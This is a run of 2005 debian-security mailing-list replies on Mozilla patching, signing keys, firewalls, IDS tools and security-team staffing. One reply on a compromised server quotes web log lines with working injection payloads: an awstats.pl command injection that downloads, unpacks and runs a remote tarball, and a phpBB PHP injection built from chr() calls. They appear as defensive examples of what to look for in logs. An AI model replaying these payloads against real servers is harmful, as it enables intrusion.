it is; the backport packages probably don't get anywhere near the QA that packages that actually go into 'stable' get. Sometimes I get the feeling that the end user must choose between reliability and security which is, in truth, a total oxymoron. I just get the feeling that things today move too fast to hold any distribution to a very strict interpretation of 'stable'. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: On Mozilla-* updates
On Sun, Jul 31, 2005 at 06:18:18PM +0100, antgel wrote: Any chance of an elaboration? I wasn't privy to any previous discussion on this and I'm interested. What's the problem with searching bugzilla for security patches on given versions, and applying them? Is it the sheer volume? http://kitenet.net/~joey/blog/entry/bug_hiding_systems-2005-07-30-06-25.html Summery: Even when new fixed packages are available the original bugs reported in Mozilla's BugZilla system are non public, as are patches. Mozilla *appears* to have no interest in supply patches which *only* fix security holes to distributors. Their line is more upgrade to the newest version. Whilst the new versions do fix the holes, they traditionally also break things built against them, such as extensions, galeon, etc. Which is why we're seeing the problem now. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: a compromised machine
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote: Since the process runs as www-data some kiddy has abused a web service on your server to download and run an external software. Look for suspicious log lines of your web server. Yes .. Examples of hacks on our servers: 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1 200 422 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts) 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] GET /phpbb/viewto pic.php?t=27highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252ech r(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)% 252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/ 1.0 200 28732 - PHP/4.3.4 It should be rather easy finding signs of weird accesses like %20 or chr(). Also look for weird signs in /tmp. Both of these attacks could be prevented by the use of mod_security, which I'd recommend you look into using in the future if you have potentially untrusted scripts running. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: My machine was hacked - possibly via sshd?
On Wed, Jul 20, 2005 at 10:17:56AM -0700, Brent Bates wrote: This morning my machine was also compromised in a similar fashion as described in your post here. http://lists.debian.org/debian-security/2005/03/msg00112.html Was the point of entry ever determined? That one seemed to be a fairly obvious weak password which was escalated into a root attack via a local kernel flaw. I just happened to log onto my machine while this was taking place. I did a ps and killed everything except non essential processes and mounted a directory tree I had with known good binaries and used those to poke around the machine. I have no idea how they got in, there were a lot of processes running as nobody. I really only run apache as nobody, so that could be the point of entry. What CGI / PHP / scripts are you running with Apache? root 955 1 0 Jan10 ?00:00:11 /usr/local/apache/bin/httpd That's not a Debian package . root 1471 1 0 Jan10 ?00:00:00 /usr/local/snmp/sbin/snmpd Neither is that. If you're going to run non-Debian packages you must keep track of them and make sure they are up to date. Have you done so ..? bates24862 24857 0 Jul11 ?00:00:00 ./server_linux -PID=tsserver2.pi root 16095 955 0 Jul18 ?00:00:00 /usr/local/sbin/cronolog --perio Don't recognise either of those. nobody4824 4752 0 06:40 ?00:00:00 ./ptr3 nobody4825 4824 0 06:40 ?00:00:00 [ptr3 defunct] nobody4826 4824 0 06:40 ?00:00:00 [ptr3 defunct] Local kernel exploitation attempts ..? root 4920 1 0 06:41 ?00:00:00 chmod 755 /usr/local/bin/ssh2 root 4925 4920 0 06:41 ?00:00:00 [chmod defunct] root 4927 1 0 06:41 ?00:00:00 mv -f sshd /usr/sbin/sshd root 4929 1 0 06:41 ?00:00:00 chown root.bin /usr/sbin/sshd Trojan installation ..? nobody4967 4964 0 06:42 ?00:00:00 perl clean 220.228.110.11 2025 IP address of attacker ..? nobody5030 5005 0 06:43 ?00:00:00 ./traci nobody5031 5030 0 06:43 ?00:00:00 ./traci nobody5032 5030 0 06:43 ?00:00:00 [traci defunct] root 5033 5030 0 06:43 ?00:00:00 [modprobe defunct] Kernel attempt again ..? Lots of detail there .. but it is a bit hard to understand without more knowlege of what is upon your system, etc. My immediate suggestion would be to disconnect the machine from the network, and proceed from there. If you have a tripwire/aide/checksumming installation in place you can use that to detect binary modifications by booting from a known-good media. If not your best option is to try to determine what route the attacker used to get in, make sure you're comfortable you can close it, and then reinstall. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Light weight IDSes and then some
On Fri, Jul 15, 2005 at 11:58:26AM -0500, George P Boutwell wrote: The Security Debian How-To mentions Tripwire. Looking at AIDE and Tripwire in the debian packages repositories it's hard to tell the difference. I'm sure they both do the job, anyone with experience with both these packages can describe some of the pros and cons of each? Simple introduction to both aide, and integrit: http://www.debian-administration.org/articles/49 It doesn't mention tripwire, which is a shame. But I'll try to update it later. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Timeliness of Debian Security Announceness? (DSA 756-1 Squirrelmail)
On Thu, Jul 14, 2005 at 05:40:22PM +0200, Herwig Wittmann wrote: This would be very convenient- but the delay that seems to have passed between the original squirrelmail security announcement and the time I received the alert via [EMAIL PROTECTED] is worrying: The Vulnerability seems to have been described a few weeks ago: http://www.squirrelmail.org/security/issue/2005-06-15 The Debian Security Advisory 756-1 is dated July 13th, 2005. This has been discussed already in the archives, you should probably refer to those rather than reviving the subject. eg the following three threads: http://lists.debian.org/debian-security/2005/06/msg00055.html http://lists.debian.org/debian-security/2005/06/msg00097.html http://lists.debian.org/debian-security/2005/06/msg00142.html I do not want to rude in any way- please try to excuse my way of putting things, but does anybody have a prediction how probable it is for such a thing to happen again? It's unknown whether the build infrastructure problems will recur, machines do die so it's possible. The communication problems leading to various misunderstandings I hope will be less likely to reoccur. Is there a role/function in debian that is responsible for reviewing bugtraq or similiar sources, and is ensured that this role is fulfilled every day? The security team do follow bugtraq, etc. Filing bugs with patches is a useful thing to do - but forwarding a message that has been posted publically already is perhaps less useful. It's not like there's not enough spam mail sent to [EMAIL PROTECTED] already ;) Or will there be other measures in place to see that security issues are noticed quickly for all packages- even for strange tools that are not used by normal unix-centered developers? I'm unsure exactly what you are suggesting about less popular tools. Sure if five issues need fixing simultaneously the less used is liable to suffer if there's a more important bug. Still even less popular tools are supported, all packages should receive updates eventually. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 741-1] New bzip2 packages prevent decompression bomb
Hallo, Ik ben op vakantie tot 20 juli. Voor support vragen kunt u contact opnemen met onze supportdesk. Voor sales en andere vragen kunt u mailen naar [EMAIL PROTECTED] Met vriendelijke groet, Steve Karnadi Hello, I am on vacation until the 20th of July. You can contact our supportdesk for support questions. Sales questions or other questions can be sent to [EMAIL PROTECTED] Regards, Steve Karnadi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: gpg-errors with apt
On Thu, Jul 07, 2005 at 12:22:36PM +0200, Johann Spies wrote: I have read http://www.debian-administration.org/articles/174 about this topic and have done what the article suggested: ~# gpg --keyserver keyring.debian.org --recv 4F368D5D This imports the key for the Debian Unstable archive. Got a timeout here. Firewall? Or if you wish you can download it from the internet, from http://www.debian.org/releases/ - towards the bottom of the page there's a link to the file ziyi_key_2005.asc. Download this and import it as follows: [EMAIL PROTECTED]:~# cat ziyi_key_2005.asc | gpg --import (Bad '' on the end of that command line.. mistake in copy + paste?) I have done this but I still get the following on aptitude update (on sid): W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F1D53D8C4F368D5D This is a completely different key - here the complain is that the archive you have in your apt.sources list, for archive3.sun.ac.za, is signed with a key 'F1D53D8C4F368D5D' which you don't have imported. W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following signatures couldn't be verified because the public key is not available: And the error says as much. The signature isn't verified because you're missing the key. NO_PUBKEY 07DC563D1F41B907 W: You may want to update the package lists to correct these missing files Find the key that the archive is signed with, import it as you did for the main Sid/Etch archive and all should be well. Is this a bug or how do I solve this problem? Not a bug with the *Debian* archive, but a missing key on your side from the look of things.. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: gpg-errors with apt
On Thu, Jul 07, 2005 at 02:14:51PM +0200, Johann Spies wrote: Ok, but the archive on archive3.sun.ac.za is just a mirror from a primary debian upstream source. Do I have to generate a spesific key for my server? Strange .. but no you need do nothing with your key(s). NO_PUBKEY 07DC563D1F41B907 W: You may want to update the package lists to correct these missing files Find the key that the archive is signed with, import it as you did for the main Sid/Etch archive and all should be well. And where do I find this key? gpg --keyserver some.key.server --recv-keys 07DC563D1F41B907 (For keyservers I use: keyring.debian.org pgp.mit.edu pgpkeys.pgp.net wwwkeys.uk.pgp.net or wwwkeys.pgp.net ) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 742-1] New cvs packages fix arbitrary code execution
Hallo, Ik ben op vakantie tot 20 juli. Voor support vragen kunt u contact opnemen met onze supportdesk. Voor sales en andere vragen kunt u mailen naar [EMAIL PROTECTED] Met vriendelijke groet, Steve Karnadi Hello, I am on vacation until the 20th of July. You can contact our supportdesk for support questions. Sales questions or other questions can be sent to [EMAIL PROTECTED] Regards, Steve Karnadi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Firewall-troubleshooting
On Sat, Jul 02, 2005 at 04:46:29PM -0400, KC wrote: I need help understanding what goes wrong in this script. I cannot ping anyone and cannot resolve as well. In fact I believe the only thing I can get is an ip address from my isp's dhcp server. There's no way I'm going to read through all of that and try to understand it. Perhaps you'd be better off starting with a smaller firewall script and then adding to it as you need? One thing did stand out though, you don't allow outgoing connections generally. These lines: iptables --policy OUTPUT DROP iptables -t nat --policy OUTPUT DROP iptables -t mangle --policy OUTPUT DROP They seem to say no output except that which is explictly allowed. For a big network I too would restrict outgoing connections, but for a home machine with only trusted hosts? It's an additional complication which doesn't gain you much. (Sure if you had a trojan which phoned home, or tried to compromise other hosts .. it would help. But .. in general it less useful than it appears). Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bad press related to (missing) Debian security
On Mon, Jun 27, 2005 at 02:36:12PM -0400, Noah Meyerhans wrote: Even allowing uploads from the secretaries could be helpful. Definitely. I've got fixed packages available right now for some of the bugs which have been raised in this thread, but until somebody can push out the advisories they're just sat around gathering dust. Part of the problem with security updates has to do with the fact that it's just difficult to coordinate the work. That's probably true, and kinda an argument against suddenly adding more members too ... The secretary position was originally created to help this situation, but it was never really clear to me what my role was supposed to be. I admit the role of the position is also a mystery to me, but one that I've not worried too much about. Reviewing patches and building fixed packages is what I've tried to do - whether that is the intended job of a secretary is largely irrelevent. Other jobs like answering mails from people who say Help my server is hacked seem more secreatrial in nature, so I've tried to answer those as time and details permit. Steve -- www.steve.org.uk -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bad press related to (missing) Debian security
On Mon, Jun 27, 2005 at 08:39:43PM +0200, Marek Olejniczak wrote: I don't understand the philosophy of Debian security team. It's really so difficult to push into sarge spamassassin 3.0.4 which is not vulnerable? This version is in Debian testing and why this version can't be push into stable? In some cases fixing a problem, which an upstream will not, or which the package maintainer cannot is *very* hard work. (eg. Mozilla/ Kernel images). In this particular case pushing the package itself isn't a hard job - the problem we're currently seeing isn't that the job is hard, but that only a very small number of people have the authority/ability to push the update out. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: getting the MAC address from an ip
On Fri, Jun 24, 2005 at 02:52:40PM +0200, LeVA wrote: How can I get a machines mac address, if I only know it's ip? If it's on your LAN ping it then look at your arp cache: [EMAIL PROTECTED]:~$ ping -c 1 192.168.1.1 /dev/null [EMAIL PROTECTED]:~$ /usr/sbin/arp 192.168.1.1 Address HWtype HWaddress Flags Mask Iface sun ether 08:00:20:C2:1E:F6 C eth0 Or if you have a login you can use ifconfig to read it: [EMAIL PROTECTED]:~$ /sbin/ifconfig |grep HWaddr eth0 Link encap:Ethernet HWaddr 00:0A:E6:F6:A3:F4 If it's a remote host then you cannot Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: debian security archive/updates b0rken???
On Sun, Jun 19, 2005 at 12:31:23AM -0400, sean finney wrote: please excuse this blatant cross-posting, i wouldn't do it if i didn't think it were critical that i do so... http://www.infodrom.org/~joey/log/?200506142140 say it isn't so! It isn't so. It's true that the design of sbuild/wanna-build means there were no autobuilders available for stable-security at the moment of sarge's release, but there was already work in progress to fix this by the time that blog entry was posted, and the claim that it looks like we'll be without security updates for quite a while caused no small amount of consternation. TTBOMK, there is now again a full complement of stable-security autobuilders available on 11 archs, and autobuilders for testing-security on 10/11 archs. It doesn't look like the security team has issued any DSAs since then, though they may have done uploads that haven't yet been published (I wouldn't know, not having access to look on klecker). -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Please allow drupal 4.5.3-1
On Fri, Jun 03, 2005 at 08:19:22AM +0200, Martin Schulze wrote: Steve Langasek wrote: On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote: On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote: Just a few hours ago, the Drupal project has released version 4.5.3, a bugfix release which fixes a serious security bug. I have created and just uploaded a 4.5.3-1 package to unstable. Updated Debconf translations are the only additional changes over 4.5.2-3 which is the version in sarge. Any reason why you can't just apply the patch to fix that specific bug? And you probably want to be emailing the release team... He did contact the release team; unfortunately, the diff between 4.5.2 and 4.5.3 is rather large and I don't believe it's all security-related, so I think this will have to be left for the security team after all. Umh, the release team most probably has even stricter rules than the ^^^ security, I guess :) release team when it comes to cluttering the diff... Absolutely -- but the release team has a deadline before which the fix must be in unstable in order for it to be included in sarge (and if everything goes according to plan, this deadline is in 12 hours), whereas you can take as much time as you want to going back and forth with the maintainer until he gets it right. :) -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Please allow drupal 4.5.3-1
On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote: On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote: Just a few hours ago, the Drupal project has released version 4.5.3, a bugfix release which fixes a serious security bug. I have created and just uploaded a 4.5.3-1 package to unstable. Updated Debconf translations are the only additional changes over 4.5.2-3 which is the version in sarge. Any reason why you can't just apply the patch to fix that specific bug? And you probably want to be emailing the release team... He did contact the release team; unfortunately, the diff between 4.5.2 and 4.5.3 is rather large and I don't believe it's all security-related, so I think this will have to be left for the security team after all. Thanks, -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Security issue with 'elog' package
On Wed, May 04, 2005 at 12:15:15AM +0300, Recai Oktas wrote: I uploaded the new upstream of Elog a few days ago (this is a sponsored package). I've just noticed a possible security flaw which affects both versions in testing (2.5.7+r1558) and unstable (2.5.8+r1637), as can be seen in the following CVS log of r1.638: http://midas.psi.ch/cgi-bin/cvsweb/elog/src/elogd.c Since the fix[1] is so trivial to backport, I can easily prepare a new package for just the version in testing. Please do so, unless you can point us to a release-critical bug addressed by the version currently in unstable. Thanks, -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Apache 1.3.33 (from sarge) and mod_chroot
I've had good luck with nullmailer for just this situation. It's simple and lightweight, works well in chroot. Steve === = Home Page: http://www.braingia.org/= === On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof J??wiak wrote: Hello! My web server was hacked a few days ago and I decided to install some new program and modules which improve security. I find in sarge libapache-mod-chroot which chroot apache (and it work fine) but I can't send mail from php. I installed ssmtp in chroot (I think so) in chroot environment but it doesn't help :( Does anyone use this module? Perhaps I do something wrong with it ssmtp... -- Krzysztof Jozwiak Debian administrator -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Apache 1.3.33 (from sarge) and mod_chroot
On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof J??wiak wrote: My web server was hacked a few days ago and I decided to install some new program and modules which improve security. Good plan. Did you find the source of the attack? If not you're at risk from a repeat of the previous one .. I find in sarge libapache-mod-chroot which chroot apache (and it work fine) but I can't send mail from php. I installed ssmtp in chroot (I think so) in chroot environment but it doesn't help :( I can't help you there, but I would suggest you look at mod-security, you can find it in Sarge. The homepage has lots of documentation, and it includes chroot functionality: http://www.modsecurity.org/ There's a brief introduction here: http://www.debian-administration.org/?article=65 Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Analysis vulnerabilities associated to published security advisories, anyone?
On Wed, Mar 09, 2005 at 12:25:06PM +0100, Javier Fern?ndez-Sanguino Pe?a wrote: Maybe you've seen it already, but the guys at Ubuntu have done a light-weight analysis of the vulnerabilities they have been released since Warty was released: https://www.ubuntulinux.org/wiki/USNAnalysis A nice page. This analysis does not match the one on ICAT's database (http://icat.nist.gov/icat.cfm?function=statistics) but probably is related to the fact that a lot of tempfile races have been found and reported recently by the Security Audit team. Yes. I would like somebody to do a similar analysis regarding Debian's vulnerabilities (Ubuntu vulns are probably a subset of those affecting woody). Has anyone enough spare time? I'd be interested in helping out, it seems like it shouldn't take too long to break things down into the type of the vulnerability and local vs. remote. A simple script I wrote did that for me already - although there are some fixups required as we seem to have a few different spellings for different things. eg. sanitizing vs sanitising. You can see the simple output here along with input and output. http://people.debian.org/~skx/2005/ I'd be interested in average advisories per week, as well as classification on the actual output. (Seems like buffer overflows are still the biggest reported thing for this year - although you've done a good job at showing temporary file issues). Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Analysis vulnerabilities associated to published security advisories, anyone?
On Wed, Mar 09, 2005 at 08:05:40PM +0100, David Schmitt wrote: On Wednesday 09 March 2005 19:13, Steve Kemp wrote: A simple script I wrote did that for me already - although there are some fixups required as we seem to have a few different spellings for different things. eg. sanitizing vs sanitising. You can see the simple output here along with input and output. http://people.debian.org/~skx/2005/ Nice script. I fixed it up to sanitise 'sanitizations' and sort output by count. diff attached. Thanks, I've applied it and updated the page. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [ph.unimelb.edu.au #1013] AutoReply: [SECURITY] [DSA 675-1] New hztty packages fix local utmp exploit
On Thu, Feb 10, 2005 at 07:59:35PM +0100, Jasper Filon wrote: maybe someone should kick him off the list? And anybody else who manages to quote the entire text of the DSA for no purpose ..? Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 671-1] New xemacs21 packages fix arbitrary code execution
On Tue, Feb 08, 2005 at 04:58:36PM +0100, Frank K?ster wrote: I find the text of this advisory really confusing - the subject and Package line talk about xemacs21, the description about Emacs, the well-known editor and your emacs packages. If it isn't sufficiently confusing to make xemacs users believe that only GNU Emacs is affected, at least it makes GNU Emacs (emacs21) users wonder whether their editor is affected, too. Both Emacs, and XEmacs are affected. Perhaps the wording was a little unfortunate though. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [Fwd: security]
Could it be this? http://lists.sans.org/pipermail/intrusions/2004-August/008357.html You didn't specify which usernames were being used, so it's tough to tell if that's the same. A couple of simple and quick things that I might do if this was a concern: -Setup an iptables firewall on the boxen running SSH and only allow certain hosts to get to port 22. Alternately, you might consider denying access through tcpwrappers, though I much prefer the iptables method. -Make sure that PermitRootLogin is set to no in your /etc/ssh/sshd_config. Some might argue the necessity or effectiveness of this measure but it is another step you can take to help defend the computer. I'm sure others have appropriate suggestions as well. Steve On Sat, Jan 29, 2005 at 03:05:35PM +, michael wrote: On debian-user it was suggested I also post this here, thanks, Michael Forwarded Message From: michael [EMAIL PROTECTED] To: debian user debian-user@lists.debian.org Subject: security Date: Fri, 28 Jan 2005 09:46:31 + I notice that frequently many machines around here get attacked by a potential hacker (a prog I guess) trying lots of usernames to get in to all the machines, using the same set of usernames at the same time. Have people seen this on their machines? I'm guessing it's a virus/worm on a Windows box doing this but does anybody know more? I've followed done most of the suggestions listed in chpts 4 5 of Securing Debian HowTo/Manual although I will admit to not following and therefore not having got around to firewalling. Other suggestions most welcome. Thanks -- Michael Bane Atmospheric Physics Group University of Manchester -- Michael Bane Atmospheric Physics Group University of Manchester -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: DSA policy change? (posting stopped to full-disclosure ML)
On Thu, Jan 27, 2005 at 11:53:45AM +0900, Seiji Kaneko wrote: The security team had posted DSAs to full-disclosure mailing list as well as Debian security announce ML, but seems to have stopped to post since last December. Are there any policy change? I'm not sure about the full-disclosure list, but the DSAs are still being announced to the Debian-security-announce list, as you can see from the online archive: http://lists.debian.org/debian-security-announce/debian-security-announce-2005/threads.html Perhaps you have a problem with your subscription / mailer / filtering? Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]